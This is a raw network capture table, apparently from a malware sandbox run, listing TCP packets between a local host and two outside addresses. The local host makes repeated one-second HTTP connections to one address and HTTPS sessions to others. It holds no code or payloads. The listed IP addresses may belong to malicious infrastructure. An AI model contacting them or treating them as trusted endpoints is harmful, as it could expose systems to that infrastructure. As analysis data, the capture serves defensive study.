Sep 30, 2024 15:38:04.988898039 CEST	80	49719	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:05.963044882 CEST	80	49719	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:05.963150978 CEST	80	49719	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:05.963207960 CEST	49719	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:05.963356018 CEST	49719	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:05.968187094 CEST	80	49719	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:05.996627092 CEST	49720	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.001929045 CEST	80	49720	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.002027988 CEST	49720	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.002381086 CEST	49720	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.002381086 CEST	49720	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.007325888 CEST	80	49720	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.007652044 CEST	80	49720	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.991324902 CEST	80	49720	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.991444111 CEST	80	49720	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.991497040 CEST	49720	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.991628885 CEST	49720	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.994354963 CEST	49721	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.996958971 CEST	80	49720	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.999190092 CEST	80	49721	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:06.999249935 CEST	49721	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.999398947 CEST	49721	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:06.999423981 CEST	49721	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.004245996 CEST	80	49721	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.004475117 CEST	80	49721	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.965688944 CEST	80	49721	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.970381975 CEST	80	49721	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.970449924 CEST	49721	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.970573902 CEST	49721	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.975362062 CEST	80	49721	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.975389004 CEST	49722	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.980354071 CEST	80	49722	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.980443954 CEST	49722	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.980631113 CEST	49722	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.980665922 CEST	49722	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:07.985402107 CEST	80	49722	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:07.985522032 CEST	80	49722	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:08.937695026 CEST	80	49722	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:08.937762976 CEST	80	49722	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:08.937819004 CEST	49722	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:08.940754890 CEST	49722	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:08.945615053 CEST	80	49722	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:08.946913004 CEST	49723	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:08.951828003 CEST	80	49723	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:08.951936007 CEST	49723	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:08.952717066 CEST	49723	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:08.952750921 CEST	49723	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:08.957693100 CEST	80	49723	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:08.957729101 CEST	80	49723	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:09.905338049 CEST	80	49723	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:09.905360937 CEST	80	49723	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:09.905426025 CEST	49723	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:09.905617952 CEST	49723	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:09.908318043 CEST	49724	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:09.910475016 CEST	80	49723	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:09.913219929 CEST	80	49724	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:09.913305044 CEST	49724	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:09.913422108 CEST	49724	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:09.913439989 CEST	49724	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:09.918400049 CEST	80	49724	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:09.918412924 CEST	80	49724	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:10.884675980 CEST	80	49724	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:10.885021925 CEST	80	49724	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:10.885092020 CEST	49724	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:10.885128021 CEST	49724	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:10.888253927 CEST	49725	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:10.890073061 CEST	80	49724	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:10.893150091 CEST	80	49725	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:10.893389940 CEST	49725	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:10.893543959 CEST	49725	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:10.893594980 CEST	49725	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:10.898700953 CEST	80	49725	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:10.898767948 CEST	80	49725	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:11.851602077 CEST	80	49725	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:11.851789951 CEST	80	49725	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:11.851843119 CEST	49725	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:11.862756968 CEST	49725	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:11.867542982 CEST	80	49725	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:12.124357939 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:12.124402046 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:12.125015974 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:12.155601978 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:12.155623913 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:13.813258886 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:13.813330889 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:13.816220045 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:13.816231966 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:13.816518068 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:13.826407909 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:13.871402979 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:14.880292892 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:14.880316019 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:14.880410910 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:14.880430937 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:14.933412075 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.332941055 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.332952023 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.333091974 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.333100080 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.333132029 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.333142996 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.333370924 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.333370924 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.333762884 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.333988905 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.334742069 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.334856033 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.714474916 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.714488029 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.714930058 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.715136051 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.715312958 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.715540886 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.715641022 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.716453075 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.716523886 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.717248917 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.717319012 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:15.717329025 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:15.717400074 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.097330093 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.097342968 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.097572088 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.097655058 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.097732067 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.098028898 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.098093987 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.098494053 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.098984003 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.098989964 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.099157095 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.099437952 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.099505901 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.099541903 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.100363970 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.100369930 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.100532055 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.102080107 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.102144957 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.102605104 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.102646112 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.102694988 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.102694988 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.102700949 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.102942944 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.103168011 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.103245974 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.185962915 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.186036110 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.401503086 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.401518106 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.401580095 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.401643991 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.401643991 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.401655912 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.401745081 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.401782990 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.401910067 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.401915073 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402103901 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402107000 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402116060 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402204990 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402218103 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402225018 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402299881 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402441978 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402506113 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402551889 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402551889 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402637005 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402652979 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.402671099 CEST	49726	443	192.168.2.8	23.145.40.164
Sep 30, 2024 15:38:16.402683020 CEST	443	49726	23.145.40.164	192.168.2.8
Sep 30, 2024 15:38:16.482285023 CEST	49728	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:16.487160921 CEST	80	49728	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:16.487231970 CEST	49728	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:16.487369061 CEST	49728	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:16.487404108 CEST	49728	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:16.492292881 CEST	80	49728	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:16.492309093 CEST	80	49728	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:17.653270006 CEST	80	49728	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:17.653536081 CEST	80	49728	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:17.653594971 CEST	49728	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:17.654136896 CEST	49728	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:17.658940077 CEST	80	49728	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:17.683547974 CEST	49729	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:17.688718081 CEST	80	49729	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:17.688791990 CEST	49729	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:17.688922882 CEST	49729	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:17.688955069 CEST	49729	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:17.694641113 CEST	80	49729	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:17.694653034 CEST	80	49729	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:18.643527031 CEST	80	49729	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:18.643544912 CEST	80	49729	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:18.643606901 CEST	49729	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:18.643753052 CEST	49729	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:18.648552895 CEST	80	49729	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:18.662352085 CEST	49730	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:18.667349100 CEST	80	49730	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:18.667440891 CEST	49730	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:18.667552948 CEST	49730	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:18.667552948 CEST	49730	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:18.672755003 CEST	80	49730	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:18.673120975 CEST	80	49730	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:19.630750895 CEST	80	49730	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:19.631556988 CEST	80	49730	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:19.631633043 CEST	49730	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:19.633549929 CEST	49730	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:19.638622046 CEST	80	49730	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:20.073198080 CEST	49731	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:20.078147888 CEST	80	49731	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:20.080487967 CEST	49731	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:20.111666918 CEST	49731	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:20.111700058 CEST	49731	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:20.116596937 CEST	80	49731	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:20.116614103 CEST	80	49731	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:21.247132063 CEST	80	49731	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:21.247581005 CEST	80	49731	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:21.247631073 CEST	49731	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:21.247684002 CEST	49731	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:21.252470970 CEST	80	49731	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:21.260822058 CEST	49732	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:21.265579939 CEST	80	49732	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:21.265639067 CEST	49732	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:21.268733025 CEST	49732	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:21.268760920 CEST	49732	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:21.273447037 CEST	80	49732	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:21.273612022 CEST	80	49732	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:22.218976021 CEST	80	49732	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:22.219073057 CEST	80	49732	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:22.219163895 CEST	49732	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:22.219329119 CEST	49732	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:22.223440886 CEST	49733	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:22.224131107 CEST	80	49732	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:22.228322983 CEST	80	49733	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:22.228724003 CEST	49733	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:22.228885889 CEST	49733	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:22.228909016 CEST	49733	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:22.233663082 CEST	80	49733	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:22.233800888 CEST	80	49733	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:23.187736034 CEST	80	49733	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:23.192181110 CEST	80	49733	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:23.194438934 CEST	49733	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:23.201827049 CEST	49733	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:23.206926107 CEST	80	49733	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:23.838541031 CEST	49734	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:23.843334913 CEST	80	49734	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:23.843424082 CEST	49734	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:23.843585968 CEST	49734	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:23.843626976 CEST	49734	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:23.848495960 CEST	80	49734	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:23.848526001 CEST	80	49734	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:24.807872057 CEST	80	49734	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:24.808105946 CEST	80	49734	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:24.808335066 CEST	49734	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:24.809371948 CEST	49734	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:24.811249018 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:24.814707041 CEST	80	49734	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:24.816431999 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:24.816505909 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:24.816634893 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:24.816654921 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:24.821643114 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:24.821656942 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.005872011 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.005892038 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.005913973 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.006012917 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.006047010 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.006558895 CEST	49735	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.009639025 CEST	49736	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.011775017 CEST	80	49735	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.014472008 CEST	80	49736	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.014545918 CEST	49736	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.014683008 CEST	49736	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.014754057 CEST	49736	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.019818068 CEST	80	49736	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.019876003 CEST	80	49736	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.988398075 CEST	80	49736	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.988513947 CEST	80	49736	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.988642931 CEST	49736	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.988852978 CEST	49736	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.991780043 CEST	49737	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.993630886 CEST	80	49736	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.996695995 CEST	80	49737	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:26.998327971 CEST	49737	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.998444080 CEST	49737	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:26.998467922 CEST	49737	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:27.003369093 CEST	80	49737	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:27.003509045 CEST	80	49737	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:27.980511904 CEST	80	49737	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:27.984683037 CEST	80	49737	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:27.988457918 CEST	49737	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:27.991147995 CEST	49737	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:27.996885061 CEST	80	49737	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:43.859518051 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:43.859575987 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:43.859678984 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:43.860057116 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:43.860068083 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.486454010 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.486546993 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.494554043 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.494589090 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.495179892 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.498835087 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.498864889 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.498879910 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.836515903 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.836539984 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.836616993 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.836643934 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.886589050 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.886614084 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.926820993 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.926887035 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.926963091 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.926995039 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.927011967 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.927186966 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.927196980 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.927239895 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.927253008 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.968188047 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.968198061 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.968342066 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.968365908 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.970397949 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.970406055 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.970433950 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:44.970472097 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:44.970490932 CEST	443	49738	23.145.40.162	192.168.2.8
